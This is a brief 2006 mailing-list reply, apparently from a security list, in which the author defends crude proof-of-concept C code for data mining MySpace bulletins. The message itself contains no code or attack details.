Date: Sun Jul  2 19:01:46 2006
From: stderr at pandora-security.com (John Hackenger)
Subject: Data Mining Myspace Bulletins

Like I already said, the code is pretty crappy. The point isn't
the horrible code, it's the myspace bulletins. The code is also
exactly what I said, proof of concept. There are probably
hundreds of different ways of doing it, but the point is that it
works. Also, I was using windows at the time of writing the
code, and I didn't want to touch batch scripting, and the C
compiler was the only thing readily available :)